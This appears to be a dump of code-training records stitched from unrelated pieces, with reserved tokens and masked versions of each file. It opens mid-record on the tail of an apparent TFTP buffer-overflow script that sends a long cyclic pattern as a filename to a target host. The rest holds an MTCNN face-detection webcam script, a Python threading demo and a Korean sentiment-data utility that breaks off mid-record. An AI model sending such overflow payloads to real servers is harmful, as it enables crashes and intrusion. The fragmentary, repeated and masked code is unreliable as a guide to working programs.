Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk\"\nmode = \"netascii\"\nbuf = \"\\x00\\x02\" + filename+ \"\\0\" + mode+ \"\\0\" \ns.sendto(buf, (host, port))", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
<|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> sys.path.extend(['detection', 'train']) <|reserved_special_token_0|> if test_mode in ['RNet', 'ONet']: detectors[1] = Detector(R_Net, 24, batch_size[1], model_path[1]) if test_mode == 'ONet': detectors[2] = Detector(O_Net, 48, batch_size[2], model_path[2]) <|reserved_special_token_0|> if config.input_mode == '1': path = config.test_dir print(path) for item in tqdm(os.listdir(path)): img_path = os.path.join(path, item) img = cv2.imread(img_path) img_labeled = mtcnn_detector.detect_and_draw(img) cv2.imwrite(out_path + item, img_labeled) if config.input_mode == '2': cap = cv2.VideoCapture(0) fourcc = cv2.VideoWriter_fourcc(*'XVID') out = cv2.VideoWriter(out_path + 'out.mp4', fourcc, 10, (640, 480)) while True: t1 = cv2.getTickCount() ret, frame = cap.read() if ret == True: boxes_c, landmarks = mtcnn_detector.detect(frame) t2 = cv2.getTickCount() t = (t2 - t1) / cv2.getTickFrequency() fps = 1.0 / t for i in range(boxes_c.shape[0]): bbox = boxes_c[i, :4] score = boxes_c[i, 4] corpbbox = [int(bbox[0]), int(bbox[1]), int(bbox[2]), int( bbox[3])] cv2.rectangle(frame, (corpbbox[0], corpbbox[1]), (corpbbox[ 2], corpbbox[3]), (255, 0, 0), 1) cv2.putText(frame, '{:.2f}'.format(score), (corpbbox[0], corpbbox[1] - 2), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 2) cv2.putText(frame, '{:.4f}'.format(t) + ' ' + '{:.3f}'.format( fps), (10, 20), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 0, 255), 2 ) for i in range(landmarks.shape[0]): for j in range(len(landmarks[i]) // 2): cv2.circle(frame, (int(landmarks[i][2 * j]), int(int( landmarks[i][2 * j + 1]))), 2, (0, 0, 255)) a = out.write(frame) cv2.imshow('result', frame) if cv2.waitKey(1) & 255 == ord('q'): break else: break cap.release() out.release() cv2.destroyAllWindows() <|reserved_special_token_1|> <|reserved_special_token_0|> sys.path.extend(['detection', 'train']) <|reserved_special_token_0|> test_mode = 'ONet' thresh = [0.6, 0.7, 0.9] 
min_face_size = 24 stride = 2 detectors = [None, None, None] scale_factor = 0.79 model_path = ['model/PNet/', 'model/RNet/', 'model/ONet'] batch_size = config.batches detectors[0] = FcnDetector(P_Net, model_path[0]) if test_mode in ['RNet', 'ONet']: detectors[1] = Detector(R_Net, 24, batch_size[1], model_path[1]) if test_mode == 'ONet': detectors[2] = Detector(O_Net, 48, batch_size[2], model_path[2]) mtcnn_detector = MtcnnDetector(detectors=detectors, min_face_size= min_face_size, stride=stride, threshold=thresh, scale_factor=scale_factor) out_path = join('validate', test_mode) + '/' if config.input_mode == '1': path = config.test_dir print(path) for item in tqdm(os.listdir(path)): img_path = os.path.join(path, item) img = cv2.imread(img_path) img_labeled = mtcnn_detector.detect_and_draw(img) cv2.imwrite(out_path + item, img_labeled) if config.input_mode == '2': cap = cv2.VideoCapture(0) fourcc = cv2.VideoWriter_fourcc(*'XVID') out = cv2.VideoWriter(out_path + 'out.mp4', fourcc, 10, (640, 480)) while True: t1 = cv2.getTickCount() ret, frame = cap.read() if ret == True: boxes_c, landmarks = mtcnn_detector.detect(frame) t2 = cv2.getTickCount() t = (t2 - t1) / cv2.getTickFrequency() fps = 1.0 / t for i in range(boxes_c.shape[0]): bbox = boxes_c[i, :4] score = boxes_c[i, 4] corpbbox = [int(bbox[0]), int(bbox[1]), int(bbox[2]), int( bbox[3])] cv2.rectangle(frame, (corpbbox[0], corpbbox[1]), (corpbbox[ 2], corpbbox[3]), (255, 0, 0), 1) cv2.putText(frame, '{:.2f}'.format(score), (corpbbox[0], corpbbox[1] - 2), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 2) cv2.putText(frame, '{:.4f}'.format(t) + ' ' + '{:.3f}'.format( fps), (10, 20), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 0, 255), 2 ) for i in range(landmarks.shape[0]): for j in range(len(landmarks[i]) // 2): cv2.circle(frame, (int(landmarks[i][2 * j]), int(int( landmarks[i][2 * j + 1]))), 2, (0, 0, 255)) a = out.write(frame) cv2.imshow('result', frame) if cv2.waitKey(1) & 255 == ord('q'): break else: break cap.release() 
out.release() cv2.destroyAllWindows() <|reserved_special_token_1|> import sys sys.path.extend(['detection', 'train']) from MtcnnDetector import MtcnnDetector from detector import Detector from fcn_detector import FcnDetector from model_factory import P_Net, R_Net, O_Net import config as config from preprocess.utils import iou import cv2 import os from os.path import join, split import numpy as np from tqdm import tqdm test_mode = 'ONet' thresh = [0.6, 0.7, 0.9] min_face_size = 24 stride = 2 detectors = [None, None, None] scale_factor = 0.79 model_path = ['model/PNet/', 'model/RNet/', 'model/ONet'] batch_size = config.batches detectors[0] = FcnDetector(P_Net, model_path[0]) if test_mode in ['RNet', 'ONet']: detectors[1] = Detector(R_Net, 24, batch_size[1], model_path[1]) if test_mode == 'ONet': detectors[2] = Detector(O_Net, 48, batch_size[2], model_path[2]) mtcnn_detector = MtcnnDetector(detectors=detectors, min_face_size= min_face_size, stride=stride, threshold=thresh, scale_factor=scale_factor) out_path = join('validate', test_mode) + '/' if config.input_mode == '1': path = config.test_dir print(path) for item in tqdm(os.listdir(path)): img_path = os.path.join(path, item) img = cv2.imread(img_path) img_labeled = mtcnn_detector.detect_and_draw(img) cv2.imwrite(out_path + item, img_labeled) if config.input_mode == '2': cap = cv2.VideoCapture(0) fourcc = cv2.VideoWriter_fourcc(*'XVID') out = cv2.VideoWriter(out_path + 'out.mp4', fourcc, 10, (640, 480)) while True: t1 = cv2.getTickCount() ret, frame = cap.read() if ret == True: boxes_c, landmarks = mtcnn_detector.detect(frame) t2 = cv2.getTickCount() t = (t2 - t1) / cv2.getTickFrequency() fps = 1.0 / t for i in range(boxes_c.shape[0]): bbox = boxes_c[i, :4] score = boxes_c[i, 4] corpbbox = [int(bbox[0]), int(bbox[1]), int(bbox[2]), int( bbox[3])] cv2.rectangle(frame, (corpbbox[0], corpbbox[1]), (corpbbox[ 2], corpbbox[3]), (255, 0, 0), 1) cv2.putText(frame, '{:.2f}'.format(score), (corpbbox[0], corpbbox[1] - 2), 
cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 2) cv2.putText(frame, '{:.4f}'.format(t) + ' ' + '{:.3f}'.format( fps), (10, 20), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 0, 255), 2 ) for i in range(landmarks.shape[0]): for j in range(len(landmarks[i]) // 2): cv2.circle(frame, (int(landmarks[i][2 * j]), int(int( landmarks[i][2 * j + 1]))), 2, (0, 0, 255)) a = out.write(frame) cv2.imshow('result', frame) if cv2.waitKey(1) & 255 == ord('q'): break else: break cap.release() out.release() cv2.destroyAllWindows() <|reserved_special_token_1|> # coding: utf-8 # In[1]: import sys sys.path.extend(['detection', 'train']) # from detection folder from MtcnnDetector import MtcnnDetector from detector import Detector from fcn_detector import FcnDetector # from train folder from model_factory import P_Net, R_Net, O_Net import config as config from preprocess.utils import iou import cv2 import os from os.path import join, split import numpy as np from tqdm import tqdm # In[ ]: # test_mode = config.test_mode test_mode = 'ONet' thresh = [0.6, 0.7, 0.9] min_face_size = 24 stride = 2 detectors = [None, None, None] scale_factor = 0.79 # 模型放置位置 model_path = ['model/PNet/', 'model/RNet/', 'model/ONet'] batch_size = config.batches detectors[0] = FcnDetector(P_Net, model_path[0]) # detecotors for PNet if test_mode in ['RNet', 'ONet']: detectors[1] = Detector(R_Net, 24, batch_size[1], model_path[1]) if test_mode == 'ONet': detectors[2] = Detector(O_Net, 48, batch_size[2], model_path[2]) # Use the three detectors to construct a mtcnn_detector = MtcnnDetector( detectors=detectors, min_face_size=min_face_size, stride=stride, threshold=thresh, scale_factor=scale_factor) out_path = join('validate', test_mode) + '/' if config.input_mode == '1': #选用图片 path = config.test_dir print(path) for item in tqdm(os.listdir(path)): img_path = os.path.join(path, item) img = cv2.imread(img_path) img_labeled = mtcnn_detector.detect_and_draw(img) cv2.imwrite(out_path + item, img_labeled) if config.input_mode == '2': cap 
= cv2.VideoCapture(0) fourcc = cv2.VideoWriter_fourcc(*'XVID') out = cv2.VideoWriter(out_path+'out.mp4', fourcc, 10, (640, 480)) while True: t1 = cv2.getTickCount() ret, frame = cap.read() if ret == True: boxes_c, landmarks = mtcnn_detector.detect(frame) t2 = cv2.getTickCount() t = (t2-t1)/cv2.getTickFrequency() fps = 1.0/t for i in range(boxes_c.shape[0]): bbox = boxes_c[i, :4] score = boxes_c[i, 4] corpbbox = [int(bbox[0]), int(bbox[1]), int(bbox[2]), int(bbox[3])] #画人脸框 cv2.rectangle(frame, (corpbbox[0], corpbbox[1]), (corpbbox[2], corpbbox[3]), (255, 0, 0), 1) #画置信度 cv2.putText(frame, '{:.2f}'.format(score), (corpbbox[0], corpbbox[1] - 2), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 2) #画fps值 cv2.putText(frame, '{:.4f}'.format(t) + " " + '{:.3f}'.format(fps), (10, 20), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 0, 255), 2) #画关键点 for i in range(landmarks.shape[0]): for j in range(len(landmarks[i])//2): cv2.circle( frame, (int(landmarks[i][2*j]), int(int(landmarks[i][2*j+1]))), 2, (0, 0, 255)) a = out.write(frame) cv2.imshow("result", frame) if cv2.waitKey(1) & 0xFF == ord('q'): break else: break cap.release() out.release() cv2.destroyAllWindows()
flexible
{ "blob_id": "f97a892e6e0aa258ad917c4a73a66e89b0dc3253", "index": 267, "step-1": "<mask token>\n", "step-2": "<mask token>\nsys.path.extend(['detection', 'train'])\n<mask token>\nif test_mode in ['RNet', 'ONet']:\n detectors[1] = Detector(R_Net, 24, batch_size[1], model_path[1])\n if test_mode == 'ONet':\n detectors[2] = Detector(O_Net, 48, batch_size[2], model_path[2])\n<mask token>\nif config.input_mode == '1':\n path = config.test_dir\n print(path)\n for item in tqdm(os.listdir(path)):\n img_path = os.path.join(path, item)\n img = cv2.imread(img_path)\n img_labeled = mtcnn_detector.detect_and_draw(img)\n cv2.imwrite(out_path + item, img_labeled)\nif config.input_mode == '2':\n cap = cv2.VideoCapture(0)\n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n out = cv2.VideoWriter(out_path + 'out.mp4', fourcc, 10, (640, 480))\n while True:\n t1 = cv2.getTickCount()\n ret, frame = cap.read()\n if ret == True:\n boxes_c, landmarks = mtcnn_detector.detect(frame)\n t2 = cv2.getTickCount()\n t = (t2 - t1) / cv2.getTickFrequency()\n fps = 1.0 / t\n for i in range(boxes_c.shape[0]):\n bbox = boxes_c[i, :4]\n score = boxes_c[i, 4]\n corpbbox = [int(bbox[0]), int(bbox[1]), int(bbox[2]), int(\n bbox[3])]\n cv2.rectangle(frame, (corpbbox[0], corpbbox[1]), (corpbbox[\n 2], corpbbox[3]), (255, 0, 0), 1)\n cv2.putText(frame, '{:.2f}'.format(score), (corpbbox[0], \n corpbbox[1] - 2), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0,\n 255), 2)\n cv2.putText(frame, '{:.4f}'.format(t) + ' ' + '{:.3f}'.format(\n fps), (10, 20), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 0, 255), 2\n )\n for i in range(landmarks.shape[0]):\n for j in range(len(landmarks[i]) // 2):\n cv2.circle(frame, (int(landmarks[i][2 * j]), int(int(\n landmarks[i][2 * j + 1]))), 2, (0, 0, 255))\n a = out.write(frame)\n cv2.imshow('result', frame)\n if cv2.waitKey(1) & 255 == ord('q'):\n break\n else:\n break\n cap.release()\n out.release()\n cv2.destroyAllWindows()\n", "step-3": "<mask token>\nsys.path.extend(['detection', 'train'])\n<mask 
token>\ntest_mode = 'ONet'\nthresh = [0.6, 0.7, 0.9]\nmin_face_size = 24\nstride = 2\ndetectors = [None, None, None]\nscale_factor = 0.79\nmodel_path = ['model/PNet/', 'model/RNet/', 'model/ONet']\nbatch_size = config.batches\ndetectors[0] = FcnDetector(P_Net, model_path[0])\nif test_mode in ['RNet', 'ONet']:\n detectors[1] = Detector(R_Net, 24, batch_size[1], model_path[1])\n if test_mode == 'ONet':\n detectors[2] = Detector(O_Net, 48, batch_size[2], model_path[2])\nmtcnn_detector = MtcnnDetector(detectors=detectors, min_face_size=\n min_face_size, stride=stride, threshold=thresh, scale_factor=scale_factor)\nout_path = join('validate', test_mode) + '/'\nif config.input_mode == '1':\n path = config.test_dir\n print(path)\n for item in tqdm(os.listdir(path)):\n img_path = os.path.join(path, item)\n img = cv2.imread(img_path)\n img_labeled = mtcnn_detector.detect_and_draw(img)\n cv2.imwrite(out_path + item, img_labeled)\nif config.input_mode == '2':\n cap = cv2.VideoCapture(0)\n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n out = cv2.VideoWriter(out_path + 'out.mp4', fourcc, 10, (640, 480))\n while True:\n t1 = cv2.getTickCount()\n ret, frame = cap.read()\n if ret == True:\n boxes_c, landmarks = mtcnn_detector.detect(frame)\n t2 = cv2.getTickCount()\n t = (t2 - t1) / cv2.getTickFrequency()\n fps = 1.0 / t\n for i in range(boxes_c.shape[0]):\n bbox = boxes_c[i, :4]\n score = boxes_c[i, 4]\n corpbbox = [int(bbox[0]), int(bbox[1]), int(bbox[2]), int(\n bbox[3])]\n cv2.rectangle(frame, (corpbbox[0], corpbbox[1]), (corpbbox[\n 2], corpbbox[3]), (255, 0, 0), 1)\n cv2.putText(frame, '{:.2f}'.format(score), (corpbbox[0], \n corpbbox[1] - 2), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0,\n 255), 2)\n cv2.putText(frame, '{:.4f}'.format(t) + ' ' + '{:.3f}'.format(\n fps), (10, 20), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 0, 255), 2\n )\n for i in range(landmarks.shape[0]):\n for j in range(len(landmarks[i]) // 2):\n cv2.circle(frame, (int(landmarks[i][2 * j]), int(int(\n landmarks[i][2 * j + 
1]))), 2, (0, 0, 255))\n a = out.write(frame)\n cv2.imshow('result', frame)\n if cv2.waitKey(1) & 255 == ord('q'):\n break\n else:\n break\n cap.release()\n out.release()\n cv2.destroyAllWindows()\n", "step-4": "import sys\nsys.path.extend(['detection', 'train'])\nfrom MtcnnDetector import MtcnnDetector\nfrom detector import Detector\nfrom fcn_detector import FcnDetector\nfrom model_factory import P_Net, R_Net, O_Net\nimport config as config\nfrom preprocess.utils import iou\nimport cv2\nimport os\nfrom os.path import join, split\nimport numpy as np\nfrom tqdm import tqdm\ntest_mode = 'ONet'\nthresh = [0.6, 0.7, 0.9]\nmin_face_size = 24\nstride = 2\ndetectors = [None, None, None]\nscale_factor = 0.79\nmodel_path = ['model/PNet/', 'model/RNet/', 'model/ONet']\nbatch_size = config.batches\ndetectors[0] = FcnDetector(P_Net, model_path[0])\nif test_mode in ['RNet', 'ONet']:\n detectors[1] = Detector(R_Net, 24, batch_size[1], model_path[1])\n if test_mode == 'ONet':\n detectors[2] = Detector(O_Net, 48, batch_size[2], model_path[2])\nmtcnn_detector = MtcnnDetector(detectors=detectors, min_face_size=\n min_face_size, stride=stride, threshold=thresh, scale_factor=scale_factor)\nout_path = join('validate', test_mode) + '/'\nif config.input_mode == '1':\n path = config.test_dir\n print(path)\n for item in tqdm(os.listdir(path)):\n img_path = os.path.join(path, item)\n img = cv2.imread(img_path)\n img_labeled = mtcnn_detector.detect_and_draw(img)\n cv2.imwrite(out_path + item, img_labeled)\nif config.input_mode == '2':\n cap = cv2.VideoCapture(0)\n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n out = cv2.VideoWriter(out_path + 'out.mp4', fourcc, 10, (640, 480))\n while True:\n t1 = cv2.getTickCount()\n ret, frame = cap.read()\n if ret == True:\n boxes_c, landmarks = mtcnn_detector.detect(frame)\n t2 = cv2.getTickCount()\n t = (t2 - t1) / cv2.getTickFrequency()\n fps = 1.0 / t\n for i in range(boxes_c.shape[0]):\n bbox = boxes_c[i, :4]\n score = boxes_c[i, 4]\n corpbbox = 
[int(bbox[0]), int(bbox[1]), int(bbox[2]), int(\n bbox[3])]\n cv2.rectangle(frame, (corpbbox[0], corpbbox[1]), (corpbbox[\n 2], corpbbox[3]), (255, 0, 0), 1)\n cv2.putText(frame, '{:.2f}'.format(score), (corpbbox[0], \n corpbbox[1] - 2), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0,\n 255), 2)\n cv2.putText(frame, '{:.4f}'.format(t) + ' ' + '{:.3f}'.format(\n fps), (10, 20), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 0, 255), 2\n )\n for i in range(landmarks.shape[0]):\n for j in range(len(landmarks[i]) // 2):\n cv2.circle(frame, (int(landmarks[i][2 * j]), int(int(\n landmarks[i][2 * j + 1]))), 2, (0, 0, 255))\n a = out.write(frame)\n cv2.imshow('result', frame)\n if cv2.waitKey(1) & 255 == ord('q'):\n break\n else:\n break\n cap.release()\n out.release()\n cv2.destroyAllWindows()\n", "step-5": "\n# coding: utf-8\n\n# In[1]:\nimport sys\nsys.path.extend(['detection', 'train'])\n\n# from detection folder\nfrom MtcnnDetector import MtcnnDetector\nfrom detector import Detector\nfrom fcn_detector import FcnDetector\n\n# from train folder\nfrom model_factory import P_Net, R_Net, O_Net\nimport config as config\nfrom preprocess.utils import iou\n\nimport cv2\nimport os\nfrom os.path import join, split\nimport numpy as np\nfrom tqdm import tqdm\n\n# In[ ]:\n# test_mode = config.test_mode\ntest_mode = 'ONet'\nthresh = [0.6, 0.7, 0.9]\nmin_face_size = 24\nstride = 2\ndetectors = [None, None, None]\n\nscale_factor = 0.79\n\n# 模型放置位置\nmodel_path = ['model/PNet/', 'model/RNet/', 'model/ONet']\nbatch_size = config.batches\n\ndetectors[0] = FcnDetector(P_Net, model_path[0]) # detecotors for PNet\nif test_mode in ['RNet', 'ONet']:\n detectors[1] = Detector(R_Net, 24, batch_size[1], model_path[1])\n\n if test_mode == 'ONet':\n detectors[2] = Detector(O_Net, 48, batch_size[2], model_path[2])\n\n# Use the three detectors to construct a \nmtcnn_detector = MtcnnDetector(\n detectors=detectors,\n min_face_size=min_face_size,\n stride=stride,\n threshold=thresh,\n 
scale_factor=scale_factor)\n\n\nout_path = join('validate', test_mode) + '/'\n\nif config.input_mode == '1':\n #选用图片\n path = config.test_dir\n print(path)\n for item in tqdm(os.listdir(path)):\n img_path = os.path.join(path, item)\n img = cv2.imread(img_path)\n img_labeled = mtcnn_detector.detect_and_draw(img)\n\n cv2.imwrite(out_path + item, img_labeled)\n\nif config.input_mode == '2':\n cap = cv2.VideoCapture(0)\n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n out = cv2.VideoWriter(out_path+'out.mp4', fourcc, 10, (640, 480))\n while True:\n t1 = cv2.getTickCount()\n ret, frame = cap.read()\n if ret == True:\n boxes_c, landmarks = mtcnn_detector.detect(frame)\n t2 = cv2.getTickCount()\n t = (t2-t1)/cv2.getTickFrequency()\n fps = 1.0/t\n for i in range(boxes_c.shape[0]):\n bbox = boxes_c[i, :4]\n score = boxes_c[i, 4]\n corpbbox = [int(bbox[0]), int(bbox[1]),\n int(bbox[2]), int(bbox[3])]\n\n #画人脸框\n cv2.rectangle(frame, (corpbbox[0], corpbbox[1]),\n (corpbbox[2], corpbbox[3]), (255, 0, 0), 1)\n #画置信度\n cv2.putText(frame, '{:.2f}'.format(score),\n (corpbbox[0], corpbbox[1] - 2),\n cv2.FONT_HERSHEY_SIMPLEX,\n 0.5, (0, 0, 255), 2)\n #画fps值\n cv2.putText(frame, '{:.4f}'.format(t) + \" \" + '{:.3f}'.format(fps), (10, 20),\n cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 0, 255), 2)\n #画关键点\n for i in range(landmarks.shape[0]):\n for j in range(len(landmarks[i])//2):\n cv2.circle(\n frame, (int(landmarks[i][2*j]), int(int(landmarks[i][2*j+1]))), 2, (0, 0, 255))\n a = out.write(frame)\n cv2.imshow(\"result\", frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n else:\n break\n cap.release()\n out.release()\n cv2.destroyAllWindows()\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
__author__ = 'dongdaqing' import threading,time class MyThread(threading.Thread): def __init__(self, name=None): threading.Thread.__init__(self) self.name = name def run(self): print time.strftime('%Y-%m-%d %H-%M-%S',time.localtime()) print self.name def test(): for i in range(0, 100): t = MyThread("thread_" + str(i)) t.start() if __name__=='__main__': test()
normal
{ "blob_id": "9c277030ef384d60e62c2c48e38a1271a43826d6", "index": 3557, "step-1": "__author__ = 'dongdaqing'\n\nimport threading,time\nclass MyThread(threading.Thread):\n def __init__(self, name=None):\n threading.Thread.__init__(self)\n self.name = name\n\n def run(self):\n print time.strftime('%Y-%m-%d %H-%M-%S',time.localtime())\n print self.name\n\ndef test():\n for i in range(0, 100):\n t = MyThread(\"thread_\" + str(i))\n t.start()\n\nif __name__=='__main__':\n test()", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
"""Файл, который запускается при python qtester """
normal
{ "blob_id": "90fc6590dab51141124ca73082b8d937008ae782", "index": 7400, "step-1": "<mask token>\n", "step-2": "\"\"\"Файл, который запускается при python qtester\n\"\"\"", "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0, 1 ] }
[ 0, 1 ]
import os import os.path import numpy as np import pickle import codecs from konlpy.tag import Okt from hyperparams import params from gensim.models import FastText #tokenizer tokenizer = Okt() def make_word_dictionary(word_dict_pkl_path=params['default_word_dict_pkl_path'], training_data_path = params['default_training_data_path']): #word_dict => 'Word':'index' word_dict = dict() if os.path.isfile(word_dict_pkl_path): #if already existed, just load it with open(word_dict_pkl_path, 'rb') as f: word_dict = pickle.load(f) print('Existed word_dict loaded') else: print('No word_dict pkl file, start making word_dict...') with codecs.open(training_data_path, 'r', encoding='utf-8') as f: word_vocab = dict() # 'word':'frequency' for line in f.read().split('\n')[1:]: review = line.split('\t')[1] #tokenizing tokens = tokenizer.morphs(review) for token in tokens: if token in word_vocab.keys(): word_vocab[token] += 1 else: word_vocab[token] = 1 word_vocab = [word for word in word_vocab.keys() if word_vocab[word] >= params['min_vocab_count']] # add pad & unk token word_vocab = [params['PAD']] + word_vocab + [params['UNK']] for idx, word in enumerate(word_vocab): word_dict[word] = idx print('Making word_dict ... 
Done and Saved') with open(word_dict_pkl_path, 'wb') as f: pickle.dump(word_dict, f) return word_dict def make_word_embedding(word_dict, word_emb_pkl_path = params['default_word_emb_pkl_path'], fasttext_path = params['default_fasttext_path']): word_emb = np.zeros([len(word_dict), params['word_emb_dim']]) if os.path.isfile(word_emb_pkl_path): with open(word_emb_pkl_path, 'rb') as f: word_emb = pickle.load(f) print('Existed trained word embedding loaded') else: #load fasttext model fasttext_model = FastText.load_fasttext_format(fasttext_path, encoding='utf8') print('No word_emb pkl file, start making word_emb ...') for word, idx in word_dict.items(): if idx==0: # PAD = 0 continue else: try: word_emb[idx] = np.asarray(fasttext_model.wv[word]) except KeyError: # if there is no word vector for certain word, just assign random vector word_emb[idx] = np.random.uniform(-0.25, 0.25, params['word_emb_dim']) with open(word_emb_pkl_path, 'wb') as f: pickle.dump(word_emb, f) print('Making word_emb ... 
Done and Saved') return word_emb def zero_padding(token_sentence, word_dict): #input : [1,4,3,2,1,15] #output : [1,4,3,2,1,15,0,0,0,0] padded_sentence = token_sentence + [word_dict[params['PAD']]]*(params['max_seq_length']-len(token_sentence)) return padded_sentence def dataset_iterator(filename, word_dict, batch_size): #yield batch for training with open(filename, 'r', encoding='utf8') as f_dataset: context = [] sequence_length = [] label = [] text = f_dataset.read().split('\n') for line in text[1:]: class_label = [0,0] review = line.split('\t')[1] polarity = int(line.split('\t')[2]) class_label[polarity] = 1 #mark polarity label.append(class_label) tokens = tokenizer.morphs(review) #if the review is too long, cut it to adequate length if len(tokens) > params['max_seq_length']: tokens = tokens[:params['max_seq_length']] sentence = [word_dict[word] if word in word_dict else word_dict[params['UNK']] for word in tokens] sequence_length.append(len(sentence)) sentence = zero_padding(sentence, word_dict) context.append(sentence) if len(context) == batch_size: yield (context, sequence_length, label) context =[] sequence_length = [] label = [] if len(context) > 0: yield (context, sequence_length, label)
normal
{ "blob_id": "430e971d2ae41bfd60e7416ecb2c26bb08e4df45", "index": 6520, "step-1": "<mask token>\n\n\ndef make_word_dictionary(word_dict_pkl_path=params[\n 'default_word_dict_pkl_path'], training_data_path=params[\n 'default_training_data_path']):\n word_dict = dict()\n if os.path.isfile(word_dict_pkl_path):\n with open(word_dict_pkl_path, 'rb') as f:\n word_dict = pickle.load(f)\n print('Existed word_dict loaded')\n else:\n print('No word_dict pkl file, start making word_dict...')\n with codecs.open(training_data_path, 'r', encoding='utf-8') as f:\n word_vocab = dict()\n for line in f.read().split('\\n')[1:]:\n review = line.split('\\t')[1]\n tokens = tokenizer.morphs(review)\n for token in tokens:\n if token in word_vocab.keys():\n word_vocab[token] += 1\n else:\n word_vocab[token] = 1\n word_vocab = [word for word in word_vocab.keys() if word_vocab[\n word] >= params['min_vocab_count']]\n word_vocab = [params['PAD']] + word_vocab + [params['UNK']]\n for idx, word in enumerate(word_vocab):\n word_dict[word] = idx\n print('Making word_dict ... 
Done and Saved')\n with open(word_dict_pkl_path, 'wb') as f:\n pickle.dump(word_dict, f)\n return word_dict\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef make_word_dictionary(word_dict_pkl_path=params[\n 'default_word_dict_pkl_path'], training_data_path=params[\n 'default_training_data_path']):\n word_dict = dict()\n if os.path.isfile(word_dict_pkl_path):\n with open(word_dict_pkl_path, 'rb') as f:\n word_dict = pickle.load(f)\n print('Existed word_dict loaded')\n else:\n print('No word_dict pkl file, start making word_dict...')\n with codecs.open(training_data_path, 'r', encoding='utf-8') as f:\n word_vocab = dict()\n for line in f.read().split('\\n')[1:]:\n review = line.split('\\t')[1]\n tokens = tokenizer.morphs(review)\n for token in tokens:\n if token in word_vocab.keys():\n word_vocab[token] += 1\n else:\n word_vocab[token] = 1\n word_vocab = [word for word in word_vocab.keys() if word_vocab[\n word] >= params['min_vocab_count']]\n word_vocab = [params['PAD']] + word_vocab + [params['UNK']]\n for idx, word in enumerate(word_vocab):\n word_dict[word] = idx\n print('Making word_dict ... 
Done and Saved')\n with open(word_dict_pkl_path, 'wb') as f:\n pickle.dump(word_dict, f)\n return word_dict\n\n\n<mask token>\n\n\ndef zero_padding(token_sentence, word_dict):\n padded_sentence = token_sentence + [word_dict[params['PAD']]] * (params\n ['max_seq_length'] - len(token_sentence))\n return padded_sentence\n\n\ndef dataset_iterator(filename, word_dict, batch_size):\n with open(filename, 'r', encoding='utf8') as f_dataset:\n context = []\n sequence_length = []\n label = []\n text = f_dataset.read().split('\\n')\n for line in text[1:]:\n class_label = [0, 0]\n review = line.split('\\t')[1]\n polarity = int(line.split('\\t')[2])\n class_label[polarity] = 1\n label.append(class_label)\n tokens = tokenizer.morphs(review)\n if len(tokens) > params['max_seq_length']:\n tokens = tokens[:params['max_seq_length']]\n sentence = [(word_dict[word] if word in word_dict else\n word_dict[params['UNK']]) for word in tokens]\n sequence_length.append(len(sentence))\n sentence = zero_padding(sentence, word_dict)\n context.append(sentence)\n if len(context) == batch_size:\n yield context, sequence_length, label\n context = []\n sequence_length = []\n label = []\n if len(context) > 0:\n yield context, sequence_length, label\n", "step-3": "<mask token>\ntokenizer = Okt()\n\n\ndef make_word_dictionary(word_dict_pkl_path=params[\n 'default_word_dict_pkl_path'], training_data_path=params[\n 'default_training_data_path']):\n word_dict = dict()\n if os.path.isfile(word_dict_pkl_path):\n with open(word_dict_pkl_path, 'rb') as f:\n word_dict = pickle.load(f)\n print('Existed word_dict loaded')\n else:\n print('No word_dict pkl file, start making word_dict...')\n with codecs.open(training_data_path, 'r', encoding='utf-8') as f:\n word_vocab = dict()\n for line in f.read().split('\\n')[1:]:\n review = line.split('\\t')[1]\n tokens = tokenizer.morphs(review)\n for token in tokens:\n if token in word_vocab.keys():\n word_vocab[token] += 1\n else:\n word_vocab[token] = 1\n word_vocab = 
